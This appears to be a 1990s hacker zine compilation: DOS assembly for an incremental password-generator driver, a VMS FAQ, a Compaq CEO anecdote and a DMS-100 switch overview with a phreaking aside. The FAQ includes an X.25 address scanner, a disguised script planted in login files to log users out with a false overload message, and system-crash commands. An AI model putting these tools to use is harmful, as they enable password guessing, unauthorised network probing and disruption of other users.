| ;-----------------------cut here-------------------------------- |
| ;Program HACKDRV.SYS |
| ; |
| org 0h |
| next_dev dd -1 |
| attribute dw 0c000h ;character device w/ ioctl calls |
| strategy dw dev_strategy |
| interrupt dw dev_int |
| dev_name db 'HACKPWD ' |
| countr dw offset number |
| number db 'aaaaaa',0ah ;<----six characters, lower case |
| numsize equ $-number - 2 |
| afternum: |
|
|
| ;working space for device driver |
| rh_ofs dw ? |
| rh_seg dw ? |
|
|
| dev_strategy: ;strategy routine |
| mov cs:rh_seg,es |
| mov cs:rh_ofs,bx |
| retf |
|
|
| dev_int: ;interrupt routine |
| pushf |
| push ds |
| push es |
| push ax |
| push bx |
| push cx |
| push dx |
| push di |
| push si |
|
|
| cld |
| push cs |
| pop ds |
|
|
| mov bx,cs:rh_seg |
| mov es,bx |
| mov bx,cs:rh_ofs |
|
|
| mov al,es:[bx]+2 |
| rol al,1 |
| mov di,offset cmdtab |
| xor ah,ah |
| add di,ax |
| jmp word ptr[di] |
|
|
|
|
| cmdtab: ;command table |
| dw init ;0 |
| dw exit3 ;1 |
| dw exit3 ;2 |
| dw ioctl_read ;3 |
| dw do_read ;4 |
| dw exit3 ;5 |
| dw exit3 ;6 |
| dw exit3 ;7 |
| dw exit3 ;8 |
| dw exit3 ;9 |
| dw exit3 ;10 |
| dw exit3 ;11 |
| dw ioctl_write ;12 |
| dw exit3 ;13 |
| dw 5 dup (offset exit3) |
|
|
|
|
|
|
| ioctl_read: |
| push es |
| push bx |
|
|
| mov si,es:[bx+10h] |
| mov di,es:[bx+0eh] |
| mov es,si |
|
|
| push cs |
| pop ds |
| mov si,offset number |
| xor cx,cx |
|
|
| get_char: |
| lodsb |
| stosb |
| inc cl |
| cmp al,0ah |
| jz ioctl_rend |
| jmp get_char |
|
|
| ioctl_rend: |
| pop bx |
| pop es |
| mov es:[bx+012h],cx |
| mov cs:countr,offset number |
| jmp exit2 |
|
|
| ioctl_write: |
| push es |
| push bx |
| mov si,es:[bx+010h] |
| mov ds,si |
| mov si,es:[bx+0eh] |
| mov cx,numsize+1 ;es:[bx+012h] |
| push cs |
| pop es |
| mov di,offset number |
| repe movsb |
| pop es |
| pop bx |
| mov cs:countr,offset number |
| jmp exit2 |
|
|
|
|
| do_read: |
| push es |
| push bx |
|
|
|
|
| push cs |
| pop ds |
|
|
| mov si,[countr] |
| inc si ;word ptr [countr] |
| cmp si,offset afternum |
| jnz is_okay |
| mov si,offset number |
| call inc_num |
|
|
|
|
| is_okay: |
| mov [countr],si |
| mov di,es:[bx]+0eh |
| mov ax,es:[bx]+010h |
| mov cx, es:[bx]+012h |
| jcxz clean_up |
| mov es,ax |
| repe movsb |
|
|
| clean_up: |
| pop bx |
| pop es |
| jmp exit2 |
|
|
|
|
| exit3: mov es:word ptr 3[bx],08103h |
| jmp exit1 |
|
|
| exit2: |
| mov es:word ptr 3[bx],0100h |
|
|
| exit1: |
| pop si |
| pop di |
| pop dx |
| pop cx |
| pop bx |
| pop ax |
| pop es |
| pop ds |
| popf |
| retf |
| exit: |
|
|
| inc_num proc near |
| push si |
| mov si,numsize |
|
|
| reiterate: |
| inc byte ptr [number+si] |
| cmp byte ptr [number+si],'z'+1 ;+1 past ending char. in range |
| jnz _exit |
| mov byte ptr [number+si],'a' ;starting char. in range |
| dec si |
| cmp si,-1 |
| jnz reiterate |
| mov byte ptr [number],01ah ;send EOF |
| _exit: |
| pop si |
| ret |
| inc_num endp |
|
|
|
|
|
|
| at_eof: ; the non-resident code starts here |
|
|
| initial proc near |
| push es |
|
|
| push cs |
| pop ds |
|
|
| push cs |
| pop es |
|
|
| mov si,offset number |
| mov di,offset tmpnum |
| cld |
| _again: |
| lodsb |
| cmp al,0ah |
| jz _nomorechars |
| stosb |
| jmp _again |
|
|
| _nomorechars: |
| mov si,offset msgend |
| mov cx,4 |
| repe movsb |
|
|
| mov ah,09 ;print welcome message |
| mov dx,offset msg1 |
| int 21h |
|
|
| pop es |
| ret |
| initial endp |
|
|
| init: call initial |
| mov ax,offset at_eof |
| mov es:[bx]+0eh,ax |
| push cs |
| pop ax |
| mov es:[bx]+010h,ax |
| mov cs:word ptr cmdtab,offset exit3 |
| jmp exit2 |
|
|
|
|
| msg1 db "Incremental Password Generator (c)1995",0ah,0dh |
| db "Written by Uncle Armpit",0ah,0dh,0ah,0dh |
| db "Starting at word [" |
| tmpnum db 10 dup (?) |
| msgend db "]",0a,0d,'$' |
| ;END hackdrv.sys |
|
|
| ;------------------------------cut here---------------------------------- |
|
|
| ;PROGRAM modpwd.asm |
| ; |
| org 0100h |
| mov ax,03d02h |
| xor cx,cx |
| mov dx,offset devname |
| int 21h |
| jnc drvr_found |
|
|
| mov ah,09 |
| mov dx,offset no_drvr |
| int 21h |
| jmp error_pass |
|
|
|
|
| drvr_found: |
| mov bx,ax |
| mov ax,04402h |
| mov cx,20 ;read 20 characters |
| mov dx,offset databuffr |
| int 21h |
|
|
| mov pass_len,al |
| dec al |
| mov ah,al |
| and al,0fh |
| mov cl,4 |
| shr ah,cl |
| add ax,03030h |
| cmp al,'9' |
| jbe inrange |
| add al,7 |
| inrange: |
| cmp ah,'9' |
| jbe inrange1 |
| add ah,7 |
| inrange1: |
| mov byte ptr [num_chr],ah |
| mov byte ptr [num_chr+1],al |
|
|
|
|
| cld |
| mov di,offset databuffr-1 |
| xor cx,cx |
| mov cl,pass_len |
| add di,cx |
| mov si,offset pass_end |
| mov cx,stringsz |
| repe movsb |
|
|
| ;check for information in command line |
| ;else--> prompt for user input |
| mov al,pass_len |
| or byte ptr [0080h],0 |
| jz req_input |
| mov cl,[0080h] |
| dec cl |
| mov [0081h],cl |
| mov si,0081h |
| mov di,offset newpass |
| mov cx,20 |
| repe movsb |
| jmp vrfy_info |
|
|
| req_input: |
| mov ah,09 |
| mov dx,offset cur_pass |
| int 21h |
|
|
| mov ah,0a |
| mov dx,offset pass_len |
| int 21h |
|
|
|
|
| vrfy_info: |
| mov ax,word ptr [pass_len] |
| cmp ah,0 |
| jz error_pass |
| dec al |
| cmp ah,al |
| jnz error_len |
|
|
| ;change the current password |
| xor cx,cx |
| mov cl,al |
| mov ah,044h |
| mov al,03 |
| mov dx,offset newpass+1 |
| int 21h |
| jnc success_pass |
|
|
| error_len: |
| mov ah,09 |
| mov dx,offset errormsg |
| int 21h |
|
|
| error_pass: |
| mov ax,04c01h ;abnormal termination |
| int 21h |
|
|
| success_pass: |
| mov ax,04c00h |
| int 21h |
|
|
|
|
| devhandle dw ? |
| cur_pass db 'Current password is [' |
| databuffr db 20 dup (?) |
| pass_end db '] ;' |
| num_chr db ' ' |
| db ' characters',0ah,0dh,0ah,0dh |
| prompt db 'New word: ','$' |
| stringsz equ $ - pass_end |
|
|
| pass_len db 00 |
| newpass db 20 dup (?) |
| errormsg db 'error changing password!',0ah,0dh,'$' |
| no_drvr db 'Error: ' |
| devname db "HACKPWD ",00 |
| db 'device driver not loaded!',0ah,0dh,07,'$' |
|
|
|
|
| ------------------------------------------------------------------------------ |
|
|
| -- Frequently & Rarely asked questions about VMS -- part one |
| by Opticon the Disassembled - UPi |
|
|
| [1] |
|
|
| " I have a kropotkin.hlp file. What could I possibly do with it ? " |
|
|
| $ library /insert /help sys$help:helplib.hlb kropotkin.hlp |
| . |
| . |
| . |
| $ help kropotkin |
|
|
| [2] |
|
|
| " I have a bakunin.tlb file. What to do with it ? " |
|
|
| $ library /extract=(*) bakunin.tlb |
| . |
| . |
| . |
| $ dir |
|
|
| [3] |
|
|
| " I would like to have a look at prunton.dat. " |
|
|
| $ dump [/block=(count:x)] prunton.dat |
|
|
| Where "x" is the number of blocks DUMP will display. |
|
|
| [4] |
|
|
| " How can I use an external editor with mail ? " |
|
|
| $ mail :== mail /edit=(send,reply=extract,forward) |
|
|
| [5] |
|
|
| " How a HELP file is organized ? " |
|
|
| $ create example.hlp |
| 1 EXAMPLE |
|
|
| THIS IS AN EXAMPLE. |
|
|
| 2 MORE_EXAMPLES |
|
|
| MORE EXAMPLES. |
|
|
| 3 EVEN_MORE_EXAMPLES |
|
|
| EVEN MORE EXAMPLES. |
| <CTRL-Z> |
|
|
| [6] |
|
|
| " How can I have a look at queues ? " |
|
|
| $ show queue smtp /all/full |
|
|
| or |
|
|
| $ show queue /batch/all/full |
|
|
| or |
|
|
| $ show queue /all/full |
|
|
| [7] |
|
|
| " My mail is holded, for some reason, in the SMTP queue... " |
|
|
| Either |
|
|
| $ delete /entry=XXX |
|
|
| or |
|
|
| $ set entry XXX /release |
|
|
| in order to force VMS to release it right away. |
|
|
| [8] |
|
|
| " How do I have a look at DTE and circuits available. " |
|
|
| $ mc ncp show known dte |
|
|
| and |
|
|
| $ mc ncp show known circuits |
|
|
| You may also may find of interest: |
|
|
| $ mc ncp show known networks |
|
|
| $ mc ncp show known lines |
|
|
| $ mc ncp show known destinations |
|
|
| [9] |
|
|
| " I need a NUA scanner for VMS. " |
|
|
| $ OPEN/READ VALUES SCAN.VAL |
| $ READ VALUES PRE |
| $ READ VALUES DTE |
| $ READ VALUES END |
| $ CLOSE VALUES |
| $ LOG = "SCAN.LIS" |
| $ TMP = "SCAN.TMP" |
| $ OPEN/WRITE FILE 'LOG |
| $ WRITE FILE "PREFIX:",PRE |
| $ WRITE FILE "START :",DTE |
| $ WRITE FILE "LAST :",END |
| $LOOP: |
| $ ON ERROR THEN GOTO OPEN |
| $ SPAWN/NOWAIT/OUTPUT='TMP' SET HOST/X29 'PRE''DTE' |
| $ WAIT 00:00:06 |
| $ SPAWN_NAME = F$GETJPI("","USERNAME") |
| $ SPAWN_NAME = F$EXTRACT(0,F$LOC(" ",SPAWN_NAME),SPAWN_NAME) + "_" |
| $ CONTEXT = "" |
| $FIND_PROC: |
| $ PID = F$PID(CONTEXT) |
| $ IF PID .EQS. "" THEN GOTO OPEN |
| $ IF F$LOC(SPAWN_NAME,F$GETJPI(PID,"PRCNAM")) .EQ. 0 THEN STOP/ID='PID |
| $ GOTO FIND_PROC |
| $OPEN: |
| $ ON ERROR THEN GOTO OPEN |
| $ OPEN/READ PAD 'TMP |
| $ MSSG = " Process stopped" |
| $ ON ERROR THEN GOTO CLOSE |
| $ READ PAD LINE |
| $ IF F$LOC("call clear",LINE) .LT. F$LEN(LINE) THEN READ PAD LINE |
| $ MSSG = F$EXTRACT(F$LOC(",",LINE)+1,80,LINE) |
| $CLOSE: |
| $ CLOSE PAD |
| $ DELETE 'TMP';* |
| $ IF F$LOC("obtain",MSSG).NE.F$LENGTH(MSSG) THEN GOTO NOCONN |
| $ WRITE FILE PRE,DTE,MSSG |
| $NOCONN: |
| $ DTE = DTE + 1 |
| $ IF DTE .LE. END THEN GOTO LOOP |
| $ CLOSE FILE |
|
|
| ( I don't have a clue by whom the code was written. ) |
|
|
| then |
|
|
| $ create scan.val |
| prefix |
| starting_NUA |
| ending_NUA |
| <CTRL-Z> |
| $ submit /noprint scan.com |
| . |
| . |
| . |
| $ search scan.lis "call connected" |
|
|
| [10] |
|
|
| " How do I crash a VAX !? " |
|
|
| $ set default sys$system |
| $ @shutdown |
|
|
| or |
|
|
| $ set default sys$system |
| $ run opccrash |
|
|
| [11] |
|
|
| " I have a dostogiefski.cld file; what do I do with it ? " |
|
|
| $ set command dostogiefski.cld |
|
|
| [12] |
|
|
| " Can I send messages to interactive processes ? " |
|
|
| $ reply [/user=username] [/bell] [/id=xxxx] " Carlos Marigella " |
|
|
| [13] |
|
|
| " How can I prevent someone from phoning me all the time ? " |
|
|
| $ set broadcast=(nophone) |
|
|
| [14] |
|
|
| " Can I postpone/disable interactive logins ? " |
|
|
| $ set logins /interactive=0 |
|
|
| $ set logins /interactive |
|
|
| will display current value. |
|
|
| Under the same `logic' : |
|
|
| $ create innocent_filename.com |
| $ set nocontrol |
| $ context = "" |
| $ pid = F$PID(context) |
| $ user_name = F$GETJPI(pid,"username") |
| $ wait 00:01:00.00 |
| $ write sys$output "" |
| $ write sys$output " System overloaded; please try again later " |
| $ write sys$output " Logging out process ''pid', of user ''user_name' " |
| $ write sys$output "" |
| $ logout /full |
|
|
| Add either to sys$system:sylogin.com or sys$login:login.com the following: |
| " $ @innocent_filename.com ". |
|
|
| [15] |
|
|
| " How can I modify the welcome file ? Where is it held ? " |
|
|
| $ set default sys$system |
| $ edit welcome.txt |
|
|
| [16] |
|
|
| " I am editing a huge text file. How can I reach the end of it ? " |
|
|
| at the editor's prompt type: |
|
|
| *find end |
|
|
| or |
|
|
| *find "search string" |
|
|
| [17] |
|
|
| " How can I be sure than noone is watching me from a hidden process ? " |
|
|
| $ show system /process |
| VAX/VMS V5.5-2 on node STIRNER 30-MAR-1937 02:10:41.94 Uptime 2 03:05:25 |
| Pid Process Name State Pri I/O CPU Page flts Ph.Mem |
| . |
| . |
| . |
| 00000114 SYMBIONT_4 HIB 5 290 0 00:00:19.05 1650 47 |
| 00000117 SMTP_SYMBIONT HIB 4 33398 0 00:16:49.67 246104 426 |
| 00000118 SYMBIONT_6 HIB 4 47868 0 00:05:09.01 296 121 |
| 00001255 SYMBIONT_0001 CUR 13 15 64293 0 00:05:08.12 1982 248 |
|
|
| $ show system /full |
|
|
| VAX/VMS V5.5-2 on node STIRNER 30-MAR-1937 02:10:59.64 Uptime 2 03:05:43 |
| Pid Process Name State Pri I/O CPU Page flts Ph.Mem |
| . |
| . |
| . |
| 00000114 SYMBIONT_4 HIB 5 290 0 00:00:19.05 1650 47 |
| [1,4] |
| 00000117 SMTP_SYMBIONT LEF 5 33407 0 00:16:49.78 246116 502 |
| [1,4] |
| 00000118 SYMBIONT_6 HIB 5 47872 0 00:05:09.03 296 121 |
| [1,4] |
| 00001255 SYMBIONT_0001 CUR 13 15 64348 0 00:05:09.60 2063 268 |
| [1,4] |
| $ |
|
|
| See the difference between system's SYMBIONT processes ( i.e. SYMBIONT_4, |
| SYMBIONT_6, SMTP_SYMBIONT ) and the one created by using a `stealth' program |
| ( SYMBIONT_0001 ); the names and the User Identification Codes may vary, but |
| state, priority, physical memory used, page faults, input/output and Process |
| IDentification numbers, can reveal, in combination, such a nastyness. |
|
|
| Afterwards you may " show process /id=xxxx /continuous ", |
| or " stop /id=xxxx ". |
|
|
| [18] |
|
|
| " Can I view the CPU usage of each process ? " |
|
|
| $ monitor processes /topcpu |
|
|
| will display a bar-chart of this kind. |
|
|
| [19] |
|
|
| Run the following .COM file and it will display information you'd |
| possibly need on an account and/or node. It uses simple lexical functions. |
|
|
| $ output :== write sys$output |
| $ output "" |
| $ node_id = F$CSID(context) |
| $ nodename = F$GETSYI("nodename",,node_id) |
| $ if F$GETSYI("cluster_member") .EQS. "TRUE" |
| $ then output " ''nodename' is a member of a cluster. " |
| $ else output " ''nodename' is not a member of a cluster. " |
| $ context = "" |
| $ username = F$GETJPI("","username") |
| $ output " Username : ''username' " |
| $ group = F$GETJPI("","grp") |
| $ output " Group : ''group' " |
| $ uic = F$USER() |
| $ output " User Identification Code : ''uic' " |
| $ pid = F$PID(context) |
| $ output " Process IDentification : ''pid' " |
| $ process = F$PROCESS() |
| $ output " Process Name : ''process' " |
| $ terminal = F$GETJPI("","terminal") |
| $ output " Terminal Name : ''terminal' " |
| $ priority = F$GETJPI("","authpri") |
| $ output " Authorized Priority : ''priority' " |
| $ maxjobs = F$GETJPI("","maxjobs") |
| $ output " Maximum Number of Processes Allowed : ''maxjobs' " |
| $ authpriv = F$GETJPI("","authpriv") |
| $ output " Authorized Privileges : ''authpriv' " |
| $ curpriv = F$GETJPI("","curpriv") |
| $ output " Current Privileges : ''curpriv' " |
| $ directory = F$DIRECTORY() |
| $ output " Directory : ''directory' " |
| $ protection = F$ENVIRONMENT("protection") |
| $ output " Protection : ''protection' " |
| $ boottime = F$GETSYI("boottime") |
| $ output " Boot Time : ''boottime' " |
| $ time = F$TIME() |
| $ output " Current Time : ''time' " |
| $ version = F$GETSYI("version") |
| $ output " VMS version : ''version' " |
| $ output "" |
|
|
| You may : |
|
|
| $ library /extract=(lexicals) /output=lexicals.hlp sys$help:helplib.hlb |
|
|
| and then transfer lexicals.hlp. |
|
|
| [20] |
|
|
| " How can I view/modify my disk quota limit ? " |
|
|
| DiskQuota was a standalone utility in versions prior to five; It is now |
| a subset of the System Management utility, and thus you should : |
|
|
| $ set def sys$system |
| $ run sysman |
| SYSMAN> diskquota show /device=dua1: [1,1] |
| %SYSMAN-I-QUOTA, disk quota statistics on device DUA1: -- |
| Node |
| UIC Usage Permanent Quota Overdraft Limit |
| [1,1] 123456 1500000 100 |
|
|
| SYSMAN> diskquota modify /device=dua1: [1,1] /permquota=654321 /overdraft=1000 |
|
|
| [END] |
|
|
| Post Scriptum |
|
|
| Some operations require privileges. |
|
|
|
|
| ------------------------------------------------------------------------------ |
|
|
| Compaq CEO blunders on TV |
|
|
| Compaq CEO Eckard Pfeiffer last week visited The Netherlands |
| to do some pr work. During a television interview for NOVA, |
| a well known news show that aired last Friday, Pfeiffer |
| claimed that pc's were easy to use, and could be used by |
| virtually anyone. So, the reporter asked him to switch the |
| tv channel on a Presario that was next to Pfeiffer that ran |
| a Windows-based TV tuner. The result was Pfeifer frantically |
| clicking on several menu bars, but instead of switching |
| channels, he exited the program altogether. To make things |
| worse, the reporter next asked him to start up a word |
| processor. Again, Pfeiffer, clicked his way around the |
| desktop, but couldn't find nor start the program. Finally, |
| he was asked to start up a game. You saw Pfeifer (now in |
| deep trouble) clicking on all the tabs of the "easy to use" |
| tab-works interface that is included on all Presario's, |
| looking for games, while muttering "Were are ze games? I |
| can't find ze games on zis machine!!!", his accent becoming |
| increasingly more German then before. It was almost like Dr. |
| Strangelove. The last shot is of a Compaq tech support guy, |
| rushing in to help him out.... So much for ease of use.... |
|
|
| Voorburgwal 129, 1012 EP |
| Amsterdam, The Netherlands). |
|
|
| ------------------------------------------------------------------------------ |
|
|
| Ok, I'm going to assume that you already know a little bit about what it |
| is you're reading. The DMS100/IBN (integrated business network) is |
| composed of mainly electronic business sets, phones, data units, and |
| attendant consoles and units, all physically at the customers place of |
| business. While the digital switching software and support hardware is |
| located at the Telco. Together, in tandem they work to give the customer |
| one of the best combinations of features and benefits. The DMS-100 |
| combines voice AND data in one business comunications package. One of |
| the many advantages is it offers the use with *any* sized business with |
| up to 30,000 lines. The IBN system controls most operations, diagnoses |
| problems, and also has the ability to do limited repairs on itself. |
| Being modular, it can meet the needs at hand, and have the ability for |
| new features, as time goes by, while still maintaining a cost-effective |
| environment. Another advantage is that is uses a central attendant where |
| and when needed. Along with Call Routing, or CDR, to control and |
| restrict Long Distnace Calling, and network management. The IBN gives |
| the user hassle free operation. Northern Telcom's DMS-100 switches, |
| which by the way are digital, are frequently backed-up by their |
| *higher trained* personnel, which isnt saying much. Some other features |
| are: Automatic Routing Selection, or ARS, which routes the long distance |
| calls, if they are even allowed, over the most economical (right) route |
| available. Station Message Detail Recording, or SMDR, which basically |
| does just what its name states, records long distance charges, including |
| but not limited to, originating number, time and length of call, |
| authorization code, and others... Yet another capability is the Direct |
| Inward System Access (DISA), which gives the personnel the ability to use |
| the system to place long distance calls cheaply, even from outside the |
| company (sounds like a PBX a bit doesn't it?). |
| System Features and Benefits: There are 6 Call Waiting Lamp Loop Keys, |
| each with its associated source AND destination lamp to signify the |
| status of both the calling and the called party status. The Second |
| feature is Alpha Numeric Display Multiple Directory Number Feature Keys, |
| up to 42 of them, which can be used for a Paging System, or speed |
| dialing, and things along those lines. A third feature is the release |
| Source/Release Destination Console, which features access to paging. |
| Other features which mainly are unimportant I will list here, they are: |
| Call Identifier Exclude Source/Exclude Destination. Remote Console Call |
| Destination. Signal Source.Signal Destination. Call Holding. Call |
| Detail Entry. Remote Console Call Selection. Console Display. Camp-on |
| Automatic Recall Conference. A 6 port 2 way splitting non-delayed |
| operation. Busy Verification of Lines. Manual and Automatic Hold. |
| Multiple Console OPeration. Busy verification of trunks. Switched Loop |
| Operation. Trunk Group Busy Indication. Uniform Call distribution form |
| queue. Multiple listed directory numbers. Control of trunk group |
| access. Secrecy. Night Service. Serial call. Speed Calling. Lockout. |
| Delayed Operation. Position Busy. Interposition Calling. THrough Call |
| Pickup. RIng Again. Multiple Directory Numbers. Intercom. Speed |
| Call. Call Transfer/Conference. On-Hook Dialing. Additional |
| Programmable Features include automatic hold. Listem-on hold. Multiple |
| Appearance Directory Numbers, or MADN. Single Call Arrangement. |
| Multiple Call Arrangement. Privacy Release. Tone Ringing with Volume |
| Control. Call Waiting. Stored Number Redial. Private Business Line. |
| And Finally a 32 character alphanumeric data unit. The DMS100/IBN can be |
| used as a "standalone" or can be attached to the business set or other |
| phone type unit. It has the ability to transmit over a two wire loop, at |
| speeds of up to 56 kb per second, using a proprietary time compression |
| multiplexing technology. The DMS100 is also available in different |
| models to suit existing terminal capacities. It also provides integrated |
| voice/data, that right data, communications. They, the phone company, |
| and data unit, can operate together, simultaniously, or even independant |
| of one another. Being fully digitized, it was one if the first switches |
| to eliminate the use of those dinosaur analog modems (for which i still |
| have a few if anyone wants to buy em off me or give me shipping money and |
| ill send em to ya free). Well thats it for now. This should give you a |
| good understanding of the capabilities of one of the many switches in use |
| today. In fact, although outdated somewhat, my telco, citizens |
| utilities, and one in stockton from what i just found out, is still using |
| this switch (poor me in elk grove, ca eh?) |
| which makes phreaking quite an easy task, not that it was really ever |
| hard but anything to make it easier help. ANyway, if you have any |
| comments/flames/general bullshit, mail it to either |
| jmatrix@mindvox.phantom.com or capthook@sekurity.com the latter being a |
| last resort email address. |
| ciao |
| ---Captain Hook |
|
|
| ------------------------------------------------------------------------------ |